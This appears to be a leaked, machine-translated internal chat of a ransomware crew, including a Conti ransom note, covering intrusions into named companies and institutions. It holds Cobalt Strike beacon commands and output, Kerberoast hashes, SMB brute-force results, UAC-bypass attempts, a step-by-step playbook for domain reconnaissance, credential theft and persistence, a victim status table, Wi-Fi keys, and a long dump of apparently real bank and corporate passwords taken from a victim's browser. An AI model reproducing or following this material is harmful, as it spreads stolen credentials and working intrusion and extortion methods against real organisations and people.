of course you can check telnet) From him like you can not hide) replica on the ping is disabled and within the settings of the system itselfwhy this?my guess is that he should not ping in this caseb no open ports from the point of scanTranny ip no open ports 10.69.201.21http://10.69.0.22:5000/ nas with backups (admin:CR@CKer$) fs see from yes this password on the admin account from two domains `CR@CKer$` they are not scans plz more dicin from these domainsAll alive ovrecomm.com ``` OVRECOMMAD01.ovrecomm.com ovrdb2.ovrecomm.com ovrdb1.ovrecomm.com OVRECOMMAD02.ovrecomm.com OVRDB1A.ovrecomm.com OVRSCDB1.ovrecomm.com ``All live ovrweb.com ``` OVRWEBAD01.ovrweb.com ovrweb1.ovrweb.com rweb2.ovrweb.com OVRWEBAD2.ovrweb.com OVRWEBAD02.ovrweb.com OVRWEB2A.ovrweb.com OVRWEB1A.ovrweb.com OVRSCWeb1.ovrweb.com OVRSCWeb2.ovrweb.com OVRSCWeb3.ovrweb.com ``no questions about the tasks have you got? + you will have all 3 then come another one from another domain + you have my first session left? nullpin.comdomain) kobu or domain?kobu give me also quietly, sessions from all pc do not pull, you can reshoot hell and check availability of hosts there do not remove dsink and hashes goodnightTill tomorrow, tomorrowbto tomorrow by 6+ give 2 more domains to look at finanal check everything here and close it fully then ok die``` dn:CN=SYSTEMCENTER,CN=Computers,DC=overland,DC=com >objectClass: top >objectClass: person >objectClass: organizationalPerson >objectClass: user >objectClass: computer >cn: SYSTEMCENTER >distinguishedName: CN=SYSTEMCENTER,CN=Computers,DC=overland,DC=com >instanceType: 4 >whenCreated: 20190613140038.0Z >whenChanged: 20201117102629.0Z >uSNCreated: 36464435 >uSNChanged: 46733431 >name: SYSTEMCENTER >objectGUID: {11A33782-FF53-4D61-B6ED-92C585B680CC} >userAccountControl: 4096 >badPwdCount: 0 >codePage: 0 >countryCode: 0 >badPasswordTime: 0 >lastLogoff: 0 >lastLogon: 132502892466357264 >localPolicyFlags: 0 >pwdLastSet: 132498579429186892 >primaryGroupID: 515 >objectSid: 
S-1-5-21-917468999-1386106184-2076119496-6860
>accountExpires: 9223372036854775807
>logonCount: 439
>sAMAccountName: SYSTEMCENTER$
>sAMAccountType: 805306369
>operatingSystem: Windows Server 2016 Standard
>operatingSystemVersion: 10.0 (14393)
>dNSHostName: SystemCenter.overland.com
>servicePrincipalName: WSMAN/SystemCenter.overland.com
>servicePrincipalName: WSMAN/SystemCenter
>servicePrincipalName: TERMSRV/SystemCenter.overland.com
>servicePrincipalName: TERMSRV/SYSTEMCENTER
>servicePrincipalName: RestrictedKrbHost/SYSTEMCENTER
>servicePrincipalName: HOST/SYSTEMCENTER
>servicePrincipalName: RestrictedKrbHost/SystemCenter.overland.com
>servicePrincipalName: HOST/SystemCenter.overland.com
>objectCategory: CN=Computer,CN=Schema,CN=Configuration,DC=overland,DC=com
>isCriticalSystemObject: FALSE
>dSCorePropagationData: 20200409185421.0Z
>dSCorePropagationData: 20190731210520.0Z
>dSCorePropagationData: 20190731210518.0Z
>dSCorePropagationData: 16010101181633.0Z
>lastLogonTimestamp: 132500823894234705
>msDS-SupportedEncryptionTypes: 28
```

```
Ping request could not find host SystemCenter.overland.com. Please check the name and try again.
```

In AD)
And where did you see it? What kind of host is this?
--- IE/Edge Credential --- Vault Type : Web Credentials Resource : https://localhost/ Identity : overland\administrator Credential : LastModified : 1/21/2016 8:52:52 PM --- IE/Edge Credential --- Vault Type : Web Credentials Resource : https://login.microsoftonline.com/ Identity : azureadadmin@overlandsheepskin.onmicrosoft.com Credential : LastModified : 3/16/2018 6:46:12 PM --- IE/Edge Credential --- Vault Type : Web Credentials Resource : https://localhost/ Identity : administrator Credential : LastModified : 4/4/2017 7:35:39 PM --- IE/Edge Credential --- Vault Type : Web Credentials Resource : https://localhost/ Identity : todd@overland.com Credential : LastModified : 1/16/2019 3:56:37 PM ``and there we'll decide what to do then half an hour more to check the network meanwhile hypervi servers and hz where the sphere and whether it is at all Find the sphere, and recheck the sphere + there is a suspicion that we are 10.69.0.90:5000 but it is disabledseveral hours close? ``Elar1n22```` todd@mail.overland.com OVERLAND\todd Elar1n55 ``Till tomorrow, see you tomorrowTill tomorrow it means that for today you can close the session1) look through the balls for interesting files and scripts that contain other creeds 2) searching for popular passes sa account on mssql servers 3) see network devices for access to them by default passwords (routers/switches) what can you do? @tl2 @tl1elevate does not workLA, and yuak does not want to bypass the domain, but LA on his tachkene have no idea, let the brute force, still going, it was in the first lines of the SBolley is not a domain user? 
``` [+] 192.168.90.6:445 - 192.168.90.6:445 - Success: '.\SBolley:thisduckingsucks!02' [+] 192.168.11.42:445 - 192.168.11.42:445 - Success: '.\SBolley:thisduckingsucks!02' [+] 192.168.110.42:445 - 192.168.110.42:445 - Success: '.\SBolley:thisduckingsucks!02' [+] 10.220.136.40:445 - 10.220.136.40:445 - Success: '.\SBolley:thisduckingsucks!02' [+] 192.168.30.42:445 - 192.168.30.42:445 - Success: '.\SBolley:thisduckingsucks!02' [+] 192.168.11.43:445 - 192.168.11.43:445 - Success: '.\SBolley:thisduckingsucks!02' [+] 10.200.132.52:445 - 10.200.132.52:445 - Success: '.\SBolley:thisduckingsucks!02' ``user8user4user3https://www.exploit-db.com/exploits/3220`spoolsv.exe there is such a process try the sharpa implementation I linked above it might be alerts on unencoded paiload in b64 encodefodhelper in sharpa https://github.com/FatRodzianko/SharpBypassUAC ``and everyone else has tried it too,`````` beacon> audit_uac [*] Tasked Beacon to audit UAC settings [+] host called home, sent: 149229 bytes [+] received output: [+] SBolley is a local Administrator! [Info] DETSBOLLEY23063 is Windows 10.0.18363. [+] Invoke-SluiBypass should work to bypass UAC. [+] Invoke-FodhelperBypass should work to bypass UAC. [+] Invoke-TokenDuplication should work to bypass UAC. ``` ` Invoke-FodhelperBypass - AV blocking Invoke-SluiBypass - hangs a seia Invoke-TokenDuplication - does not work all the methods have not helped? 
>memberOf: CN=SQL Financial

User: DBunte - IP Address: 192.168.90.2
User: Melissa - IP Address: 192.168.0.126
User: Melissa - IP Address: 192.168.0.28
User: srethmeier - IP Address: 192.168.0.124
User: achackes - IP Address: 192.168.0.61

So far I have only found >memberOf: CN=SQL Financial, and I'm looking for someone to yank the dotted [sic] from. The Exchange server: didn't find it.
For tomorrow?
Well, and the mailbox, but that's all you have to do right on the network.
Tomorrow I suggest you close all 3)
We have almost everything ready on evo as well, except for a couple of NAS boxes; that's why both are ready. They don't go there very often, there's no point in waiting around in this spirit: writing "my password doesn't fit" and getting "what are you, stupid, it's on the sticker on your monitor". To have everything ready it should be done on closing day; it could get any answer, everything is in the moment) very dangerous, and we will get kicked out immediately.
Haha, as one IT guy writes to another "what's the pass to the Nimble".
Or try a session.
Plan like this: we either close without the Nimble, but we need the data; there is a backup .pst of one IT guy.
I still prioritize #rtpcompany-com, as it is closer to closing.
Besides the Nimble, is the rest ready? Backups and other things.
There is nothing.
What?
And write yourself a mind map for raising rights from LP to DA.
Now write detailed reports to the PS on the work done in the last 2-3 days. Meanwhile you can take care of organizing entries for modules and other things, and also write yourself a manual on all the vectors there were and in what order it is better to act. Finish at 20:00 today.
http://fixmypc.ru/post/kak-naiti-zaloginenykh-polzovatelei-aktivnye-s-s-powershell/
If the `beacon_reverse_tcp` payload works as `Windows Executable (S)`, which went through `shellConcatenation.1.0.0`, but doesn't work through `rportfwd`, most likely the problem is in `rportfwd` itself.
And tested on a normal https listener?
or already on rportfwd? and what do not like `Attack -> Packages -> Payload Generator`? it is 255 times larger Yes, but not sure that `shellConcatenation.1.0.0` itself supports such file size RAW) and about `rportfwd` not quite understand ``` beacon> help rportfwd Use: rportfwd [bind port] [forward host] [forward port] rportfwd stop [bind port] Binds the specified port on the target host. When a connection comes in, Cobalt Strike will make a connection to the forwarded host/port and use Beacon to relay traffic between the two connections. ````Windows Executable (S) - RAW ` is a stageless variant, namely when you do RAW through `Attack -> Packages -> Payload Generator ` you make an intermediate file that after launching it downloads the working code of the coba itself, in `Windows Executable ` immediately goes this working code, without additional paginghit then until lunch, work with it all together + from sessions only MATCHES?good morninGood morninG I'm goinG downstairsGonna be quiet(@tl2 on kerbals quiet?(only neatly, it's paintedBeep the door powerful🗿There's a zabulydalaGood morninG good morninG good morninG good morninG is quiet(@tl2 on kerbals quiet?(fix couldn't be set up no session no? otsql$benihana.com$MSSQLSvc/bensvr-corp.benihana.com S3curity! ichiban$benihana.com$MSSQLSvc/bensvr-corp.benihana.com S3curity! ``bvot ker''. $krb5tgs$23$*admbchapman$benihana.com$MSSQLSvc/bensvr-corp.benihana.com S3curity! Sessions are dead? I'll replay them all at once, then give me 2F, is it possible to replay sessions? 
We still have a third one. I'm just stressed that in general I can't get in all the time) and by the way you're not in the other one) plus I'm not really from here) including the Americans) here 99 people know where the fuck I'm from. We have dolphin concerts on the boardwalk, dope dudes' shows on acid, vodka under Uncle Jura. Rock isn't too effective here sometimes) and the action is somewhere far away) and here it doesn't get tiring. Moscow is poured in, everyone there on the pampa, some competitive level, full of traffic.
Used to it, it contributes) Used to it) How much more) That's the point) Aren't you used to it?))) It contributes))) As we always have, in general))) My weather also contributes.
I also think about it lately) but it's too stable, I don't have any problems, everything works. No, I like it here, it's ok.
OK, fine. Since the beginning of December already. Good, you had a rest) While I'm still functioning I need to seize the moment) I'll go for treatment) If I don't get off before the end of the month I can't get off the booze. I'm all ok)
And at night they'll close everything. Tomorrow come by 6, they'll make it today. Sleep, and they just want to sleep) They complain to you?) They're sleepy, they're sleepy.
I think you started there, no? You have to go online first.
So there's a nix 0d LP that came out on the net recently) If you have access to the extended server you can check it out.
On papersource!!! Oh, by the way, that papersource is fucked if they took out the webshell there.
pres.com is still left, but you need an exe to run it.
There's also triadmetals; I think if there's a bot on the net you can get it, it's ownerless. They may or may not pay, it's roulette, it doesn't depend on anything. They are all in process... I think not.
On the dream, will they pay?
All in the works, my 4.
What else, your bots are there on the backdoor? The point?
snu.edu, do for now; there's a fucking penny of work out there((
The dude is offline for now, will be around by 22 (I'll work with her 2FA)).
Do it and tell me how the other 3 sessions will be re-shot. Ok.
If anything, the work was at the time of the report, and then I went to other tasks) Wrote) IN PROGRESS.
Nah, only current ones in work.
Food work? There are no more on the IPs.
This was already noted. Yes.
See globaltranz. 250 by 205.236.0.43, 204.134.196.195, 107.0.14.250: re-capture the sessions on these three?

EXTERNAL         INTERNAL         VPN              OWNER  REVENUE  STATUS       LOG
lrhc.org         lrhc.local       66.228.239.136   user8  140kk    IN PROGRESS  ntds, research
                                  205.236.0.43     user4           STOPPED      no valid accounts
snu.edu                           204.126.2.44     user7           IN PROGRESS
                                  204.134.196.195  user4           STOPPED      1 acc not valid, 1 acc 2fa
                                  107.0.14.250                                  2fa
globaltranz.com  Globalnet.local  162.42.243.250                   ERROR        blocked

Why the fuck not, lol. Maybe we'll make a comeback to chelsea? We've had it since sonic)
Thanks, love ya.
But for 4.1 it's the same as it was.
What?
eemo, can you send me the coba tuning guide? I'll make some notes for myself.
Describe the current status of the targets we have with VPNs that are SonicWalls? What about the work?
overland is gonna drop
ok =)

All of your files are currently encrypted. Backups have been encrypted or deleted, same as Shadow Copies. If you try to use any additional recovery software - the files might be damaged, but if you are still willing to try - try it on the data of the lowest value. To make sure that we REALLY CAN recover all of the encrypted data - we offer you to decrypt 2 random files of your choice completely free of charge. The faster you reply - the easier and cheaper it will be.
To receive information on the price of the recovery software you can contact our team directly for further instructions through our website:

TOR VERSION: (you should download and install TOR browser first https://torproject.org)
http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/

HTTPS VERSION: https://contirecovery.best

---BEGIN ID---
W2GzoYgyg5zZYaIAHs4u2MR6UaxLrzlsyRb8qzwHbzENpcIR8KkCR8gmXgaDryRo
---END ID---

So it's already. Hi. The target asked in a note to remove everything except the chat and the instructions on how to get there. When you order the builds. Hi, we don't have them, and the keylogger isn't installed either. I dunno, when connecting the Forti client it asks for a login and password, as I remember. Or was it quickly knocked out? It seems not. After running the commands, are the interfaces up? Did you do this?

```
beacon> shell wmic nic get name, index
[*] Tasked beacon to run: wmic nic get name, index
[+] host called home, sent: 55 bytes
[+] received output:
Index  Name
0      Microsoft Kernel Debug Network Adapter
1      Intel(R) Ethernet Connection (6) I219-V
2      Intel(R) Wi-Fi 6 AX200 160MHz
3      Microsoft Wi-Fi Direct Virtual Adapter
4      Fortinet Virtual Ethernet Adapter (NDIS 6.30)
5      Fortinet SSL VPN Virtual Ethernet Adapter
6      PPPoP WAN Adapter
7      WAN Miniport (SSTP)
8      WAN Miniport (IKEv2)
9      WAN Miniport (L2TP)
10     WAN Miniport (PPTP)
11     WAN Miniport (PPPOE)
12     WAN Miniport (IP)
13     WAN Miniport (IPv6)
14     WAN Miniport (Network Monitor)
15     Bluetooth Device (Personal Area Network)
16     Microsoft Wi-Fi Direct Virtual Adapter #2
17     Broadcom NetXtreme Gigabit Ethernet

beacon> shell wmic path win32_networkadapter where index=4 call enable
[*] Tasked beacon to run: wmic path win32_networkadapter where index=4 call enable

beacon> shell wmic path win32_networkadapter where index=5 call enable
[*] Tasked beacon to run: wmic path win32_networkadapter where index=5 call enable
[+] host called home, sent: 174 bytes
[+] received output:
Executing (\\UKHOEVLT3156\root\cimv2:Win32_NetworkAdapter.DeviceID="4")->enable()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ReturnValue = 0;
};
[+] received output:
Executing (\\UKHOEVLT3156\root\cimv2:Win32_NetworkAdapter.DeviceID="5")->enable()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ReturnValue = 0;
};
```

Yes, there seems to be a disconnect.

```
[03]: Fortinet Virtual Ethernet Adapter (NDIS 6.30)
      Connection Name: Ethernet 2
      Status:          Media disconnected
[04]: Fortinet SSL VPN Virtual Ethernet Adapter
      Connection Name: Ethernet 3
      Status:          Media disconnected
```

```
Windows IP Configuration

Ethernet adapter Ethernet 3:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Ethernet adapter Ethernet:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Wireless LAN adapter Local Area Connection* 1:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Wireless LAN adapter Local Area Connection* 10:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Ethernet adapter Ethernet 2:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :

Wireless LAN adapter WiFi:
   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : 2a02:c7d:a28:5100:7de6:b515:bbeb:89c0
   IPv6 Address. . . . . . . . . . . : fdb0:64:3df8:0:7de6:b515:bbeb:89c0
   Temporary IPv6 Address. . . . . . : 2a02:c7d:a28:5100:c889:fce9:a8e0:ab10
   Temporary IPv6 Address. . . . . . : fdb0:64:3df8:0:c889:fce9:a8e0:ab10
   Link-local IPv6 Address . . . . . : fe80::7de6:b515:bbeb:89c0%11
   IPv4 Address. . . . . . . . . . . : 192.168.0.80
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::7e4c:a5ff:fef9:c2a0%11
                                       192.168.0.1
```

```
Host Name:                 UKHOEVLT3156
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.18362 N/A Build 18362
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Member Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:   MatchesFashion
Product ID:                00330-52356-69234-AAOEM
Original Install Date:     11/29/2019, 12:10:04 PM
System Boot Time:          9/18/2020, 9:20:23 AM
System Manufacturer:       HP
System Model:              HP EliteBook 830 G6
System Type:               x64-based PC
Processor(s):              1 Processor(s) Installed.
                           [01]: Intel64 Family 6 Model 142 Stepping 12 GenuineIntel ~1600 Mhz
BIOS Version:              HP R70 Ver. 01.02.01, 8/26/2019
Windows Directory:         C:\windows
System Directory:          C:\windows\system32
Boot Device:               \Device\HarddiskVolume1
System Locale:             en-gb;English (United Kingdom)
Input Locale:              en-us;English (United States)
Time Zone:                 (UTC+00:00) Dublin, Edinburgh, Lisbon, London
Total Physical Memory:     7,998 MB
Available Physical Memory: 850 MB
Virtual Memory: Max Size:  29,502 MB
Virtual Memory: Available: 15,235 MB
Virtual Memory: In Use:    14,267 MB
Page File Location(s):     C:\pagefile.sys
Domain:                    matches.com
Logon Server:              N/A
Hotfix(s):                 5 Hotfix(s) Installed.
                           [01]: KB4514359
                           [02]: KB4513661
                           [03]: KB4515383
                           [04]: KB4516115
                           [05]: KB4515384
Network Card(s):           4 NIC(s) Installed.
                           [01]: Intel(R) Ethernet Connection (6) I219-V
                                 Connection Name: Ethernet
                                 Status:          Media disconnected
```
[02]: Intel(R) Wi-Fi 6 AX200 160MHz Connection Name: WiFi DHCP Enabled: Yes DHCP Server: 192.168.0.1 IP address(es) [01]: 192.168.0.80 [02]: fe80::7de6:b515:bbeb:89c0 [03]: fdb0:64:3df8:0:c889:fce9:a8e0:ab10 [04]: 2a02:c7d:a28:5100:c889:fce9:a8e0:ab10 [05]: fdb0:64:3df8:0:7de6:b515:bbeb:89c0 [06]: 2a02:c7d:a28:5100:7de6:b515:bbeb:89c0 [03]: Fortinet Virtual Ethernet Adapter (NDIS 6.30) Connection Name: Ethernet 2 Status: Media disconnected [04]: Fortinet SSL VPN Virtual Ethernet Adapter Connection Name: Ethernet 3 Status: Media disconnected Hyper-V Requirements: VM Monitor Mode Extensions: Yes Virtualization Enabled In Firmware: Yes Second Level Address Translation: Yes Data Execution Prevention Available: Yes ```systeminfo and ipconfig about interfacesWhat other ideas? All services with fortinet in their names are running. Fortinet's virtual interfaces are on. To no avail. The domain does not appear. _-_-_-_-_-_-_-_-_-_-_-_-_--> [+] WIFI <-_-_-_-_-_-_-_-_-_-_-_-_-_-_- SSID name : "rothbarguest" Cipher : None SSID name : "BA53LG" Cipher : CCMP Cipher : GCMP Key Content : pinkblind SSID name : "SKYCWVNA" Cipher : CCMP Cipher : GCMP Key Content : 81kwISrQXbTM SSID name : "home" Cipher : CCMP Cipher : GCMP Key Content : jake2210boy SSID name : "BT-NGAFJ8" Cipher : CCMP Cipher : GCMP Key Content : CM3NxJT63QDiLt SSID name : "BTHub5-K3M6" Cipher : CCMP Cipher : GCMP Key Content : 76cc939872 SSID name : "TALKTALK-ADE727" Cipher : CCMP Cipher : GCMP Key Content : AGWGA9W6 SSID name : "BT-68A2KJ" Cipher : CCMP Cipher : GCMP Key Content : VpHFa7NVYnKYub SSID name : "Elfordleigh" Cipher : CCMP Cipher : GCMP Key Content : Security12 SSID name : "SKY94FE2" Cipher : CCMP Cipher : GCMP Key Content : RBPXFQEA SSID name : "MF_Guest" Cipher : CCMP Cipher : GCMP Key Content : MatchNow `````` Louisad M@tches2020!!! You can also put me in the new rocket. 
skytechinc.com

@user9 - prepares the network and still hasn't given me an external domain for the conf
@user7 - #corp-televisa-com-mx
@user8 - gave me a VPN
@user3 - gave me a ripcord
@user4 - gave out a VPN, kznm

So he's a deadbeat, he... @user9 is busy with the network, he's preparing to close out. Me - definitely not caught? I don't think so. They had no password manager set up on solara. That's what? #ballymoregroup-com: there were two nasal passwords, one didn't work. 2 backups of the server with the listings removed. Looked for a sphere, then it crashed; first came back, knocked out the first us, changed passwords, then it crashed, then came back. A machine that does not have access to the domain; from the VPN no configs, no creds; a keylogger was installed, did not catch anything. Checked mp? sccy: collected browsers from ALL computers, no thresholds. Already not the first day with them. On sccy and ballymore write that it's done (remember, the VPN cannot be turned on without a confirmation code, they have 2FA). Was in work. Session alive. Detached from the company. Detailed to take a new one. vsm gone? If there's something to take, I'll take it, I've got a guy who left #corp-televisa-com-mx. sccy, ballymore fell off. I'm sure no one from the office came in either, but you'd better change it while I'm with user7. I'm late, who came at all? Did everyone sleep at home? Did I ask my friends about their domain?

```
01/28 12:07:45 *** sup has joined.
01/28 12:10:25 *** sup has left.
```

Not. sup.

```
beacon> exit
[*] Tasked beacon to exit
```

@tl1, are you out of all sessions in the cob 172....218?
Hi all, tomorrow by 5. login_passwd / login_username in snu.edu. Trying to get out of the VPN. I'm trying to get out of Coppers with SMBGhost and a bunch of different RDP exploits I tried - all bypassed. How to order salt on hydra there) I don't know about hydra) I'm trying to figure out hydra in #corp-televisa-com-mx, trying to break into any machine. @user9 went away for a long time to sort out hydra, to sort out hydra with hydra, how to brute web forms, another way to brute the webs, sort out hydra without +. What are you doing) - brute all in sccy? ++ sssss. Who's busy with what?

At the input we have an ordinary bot with user rights, and we consider the first stage of work from this context.

1. Gathering information about the domain controllers on the network and checking if the domain is visible:
- net domain_controllers
- net dclist
- shell nltest /dclist:
The first of the three commands is usually sufficient, but if it gives no result, you can try the others.

2. Gathering information about Active Directory composition using AdFind.exe:
- Load adfind.exe and adf.bat into a writable folder
- move the cobalt bin to the folder
- run shell adf.bat
- wait for the script to finish
- download the result and delete what we uploaded to the machine

Wrote it on the basis of your guide) Yes, I understand, you could take adfind + shuffle the first items and other stuff; it was written with the expectation of a skip-AV lab, to quickly reload. If you find the admin share available, periodically do something like `type C:\path\output.txt` to look through it in the beacon console, if ShareFinder takes long. It's in the words, I'll add it to the commands.

ENTRY POINT guide

1. Gathering primary information about the domain and the environment:
- Domain name
- DCs list
- LA\DA\EA
- Password policy
- PS
- EDR
- Systeminfo
On the basis of this information we see what kind of network we are looking at: a workgroup with VPN, a lab, a work network.
If you can't make a conclusion from step 1, go to step 2.

2. Collecting BP information:
- ADFind
- ADFind trust
If the total size of the files is more than 40 MB, you need to put them into an archive. After analyzing the AD we make a conclusion about the network type. If it is a workgroup without a visible domain, we skip it and take the next network to work on. If it is a full-fledged network, move on.

3. Gathering additional information about the domain and environment:
- Browser Dump
- Seatbelt
- kerberoast, asreproast
- DuzzleUP
- WinPEAS
- Watson
- GPP
- ShareFinder
All files in the process and logs you put in a folder with the name of the external network domain, under the names corresponding to the utilities you run. You pass the hashes for brute-force to team lead 2.

4. Additional actions. During the ShareFinder run, we run persist on the entry point (ONLY IF IT WAS SUGGESTED TO YOU):
- generate a NEW build for EVERY run
- hide the dll in user folders (preferably appdata and as far away as possible)
- run it, check that the dll is not deleted + the scheduled task appeared, write to me: hostname, startup rights
All files are duplicated in the conf, as well as stored in a separate folder in your local.

There is of course the fucked-up 10 minutes? Understand what a fuck-up? And found them in the center of the fuck))) They just haven't touched the locker, so I understand they recovered through these ESXi. Didn't you read? Ah, geez, they're looking for SSH access in the ESXi + rubik. Yeah, have plans for the hospital theme again?)) OK. Ah, you dumped the hash here and wrote there for you to look here) Well, I did not write more) And so I wrote: so, the hash is in brute force. What exactly to check?
OK, secv brute, please.

```
TicketByteHexStream  :
Hash                 : $krb5tgs$23$*Administrator$activedirectory.fishusa.com$MSSQLSvc/Fishusa-DC.activedirectory.fishusa.com[...]
SamAccountName       : Administrator
DistinguishedName    : CN=Administrator,CN=Users,DC=activedirectory,DC=fishusa,DC=com
ServicePrincipalName : MSSQLSvc/Fishusa-DC.activedirectory.fishusa.com:55423
```

Lolospodayi ok)))) I just renamed hook.jar to Hook.jar. Tomorrow)

I'm going to sleep, in general no strength. Means you'll have to:

```
java -XX:ParallelGCThreads=4 -XX:+AggressiveHeap -XX:+UseParallelGC -Xms512M -Xmx1024M -javaagent:Hook.jar -jar cobaltstrike.jar $*
Error opening zip file or JAR manifest missing : Hook.jar
Error occurred during initialization of VM
agent library failed to init: instrument
```

Duplicate it...?

But we caught depa (and the detector is less, even though it was active, but his old stub was not caught). And how did depa appear again? Without internet. dyncheck.com/scan/id/535edae924db877964d784a8713f84fc - stub depa. And then scatter to all the workstations, start with the servers, and generate only Cobalt shellcode. Is the builder fresh? And bluntly, fuck, some "on duty" person will notice the anomaly on a PC. If they all wake up from sleep, then the locker itself will take a decent amount of time. Are there some methods to work on speed?
Listen: http://helpdocpt.club/threads/some-cool-stuff-%D0%A1-pws-cna.38/ Since I was allowed into the garden, I commented on some topics. I propose to put my humble remarks right in the first post so you don't have to read the whole thread. Can we at least chat? The task for both teams today until 21:00; if you do gpj you can go earlier. You will now be in active practice, just with the aim of increasing rights; there will be cases where you will need to learn new things, where the standard methods will not work, and they just should be systematically added. A tangle, I think, no problem; this is still a relative "order" of action. The question is the shortcut here, that is, the allocation of priority vectors, and then secondary and tertiary, that is, more difficult to exploit and less common. In any case it looks confusing because, for example, the previous version of the diagram was difficult to bring to a sensible form. For infinite, most likely you will have to move to another platform or present it in a different way. The given mindmap is essentially the basis of the whole cycle of possible actions, that is, you can extend it almost to infinity) Then just develop it by vectors with an indication of the vulnerabilities used (both LPE and network ones). The MsSql vector as a whole, what to add? I understand you already "see"?
But the beginning is correct, yes)) But promises without naughty) I can give you my account (please send the login in PM under which I can read). Mind-map remaster: http://helpdocpt.club/threads/mind-map-%D0%BF%D0%BE-%D1%8D%D1%81%D0%BA%D0%B0%D0%BB%D0%B0%D1%86%D0%B8%D0%B8-%D0%BF%D1%80%D0%B8%D0%B2%D0%B8%D0%BB%D0%B5%D0%B3%D0%B8%D0%B9.33/ Latest version: https://www.xmind.net/download/ Until lunch, continue yesterday's task on the mindmap and organize instructions :space_invader: Hi. Good morning. Good morning. Good morning. Good morning. Where is @user3? pcsb.org, say, can I in this, what's it, `pinellas.local`, and me? Yes, in lss, thanks. Good morning. Can the new cob? Mine got busted. There were two nets closed :space_invader: Hi, v turned on) Yes. Hello, user8 should be turned on, it's back. Hi. Hi, where is everybody? Goodnight, tomorrow by 5. But also nowhere to go, are there Citrix admins? User groups - users? Or servers? Any other groups? In #corp-televisa-com-mx moved from the entry point. So far yes. No, checked all the servers and machines where there is access; from the user segment I have not yet been able to get out to the servers. What have you done today? With this user I can only be authorized on the virtual labs (on other machines I could not authorize); checked all the browsers - clean; passwords from GPP did not match any of the domain users; kerbs removed and sent to brute force; Seatbelt did not find anything (files and browser history); on all machines tried all the elevates that I have (literally all, even bypassing waka); ShareFinder not rolled anywhere, also clean; now rechecking on this machine (the past 2, all clear). Browsers? No system rights? I wonder what else can I try? Is there no other option? Is it just a matter of waiting for the hash to unload the adfssvcadmin? Yes, and your current domain username? When you check, please write to feedback if it does not work. Hashfinder removed?
on other machines can not get up, eleveit kit does not work, what can i try? passwords (4 if you count the pass to the current user) that is not suitable to any acu all passed to the brute force already, both fikkerbya you gave hashes @tl2? LA passwords do not fit, eleveite did not help, I think to jump to another car and there try to climbbuyuyu password to the local admin ? Domain Controllers: Server Name IP Address ----------- ---------- HSU-ADDC01 137.150.144.180 HSU-ADDC07 137.150.146.61 HSU-ADDC03-AZ 10.52.0.196 ``Now that's the way the chein shoots no ad_trustc ls @tl2@tl1 @tl2 can hash on the brute force``. [*] Tasked beacon to run .NET program: SharpChromium.exe logins [+] host called home, sent: 690231 bytes [+] received output: [*] Beginning Google Chrome extraction. --- Chromium Credential (User: MichaelLee) --- URL : https://registration.tco.census.gov/myreg/change-password.jsf Username : michaellee@missme.com Password : MissRock90058% --- Chromium Credential (User: MichaelLee) --- URL : https://id-provider.tco.census.gov/nidp/saml2/sso Username : michaellee@missme.com Password : MissRock90058% --- Chromium Credential (User: MichaelLee) --- URL : https://www.ups.com/lasso/login Username : dm1002 Password : KPN@12th --- Chromium Credential (User: MichaelLee) --- URL : https://www.ups.com/lasso/login Username : dm1001 Password : KPN@12th --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : deodarmichael1 Password : sweet8040 --- Chromium Credential (User: MichaelLee) --- URL : https://web17.secureinternetbank.com/EBC_EBC1961/EBC1961.ashx Username : Password : 152994828040 --- Chromium Credential (User: MichaelLee) --- URL : https://secure.pbcusa.com/PBCLogin/pbclogin.aspx Username : 3180 Password : rock0058 --- Chromium Credential (User: MichaelLee) --- URL : https://secure.pbcusa.com/PBCLogin/pbclogin.aspx Username : 3601 Password : dm0058 --- Chromium Credential (User: MichaelLee) --- URL : 
https://www.fedex.com/en-us/home.html Username : MissMe Password : Sweet90058! --- Chromium Credential (User: MichaelLee) --- URL : https://sdg2.mastercard.com/static/private-portal-ui/ Username : Mi Password : seoul --- Chromium Credential (User: MichaelLee) --- URL : https://www.ups.com/lasso/login Username : MISSMEMICHAEL Password : !Alameda4715 --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : willing1 Password : 0058sweet --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : willinglee Password : sweet8040 --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : 3031olympicmichael Password : Spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://sellercentral.amazon.com/ap/signin Username : AndyP@missme.com Password : 4715Missme --- Chromium Credential (User: MichaelLee) --- URL : https://danceandmarvel.com/index.php/oitmain Username : michael Password : michael1234 --- Chromium Credential (User: MichaelLee) --- URL : https://identity.avalara.com/account/login Username : michaellee@missme.com Password : Miss8040* --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : 3019westmichael Password : Spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : 355kingsleymichael Password : Spai8040 --- Chromium Credential (User: MichaelLee) --- URL : https://secure.onlinelabels.com/SignIn.aspx Username : michaellee@missme.com Password : sweet8040 --- Chromium Credential (User: MichaelLee) --- URL : https://sdg2.mastercard.com/pkmslogin.form Username : Michael_Lee Password : ^RcRvMiSs90058 --- Chromium Credential (User: MichaelLee) --- URL : https://online.hanmi.com/HanmiBankOnline/Uux.aspx Username : rcrvmichael1 Password : Rcrv8040 --- Chromium Credential 
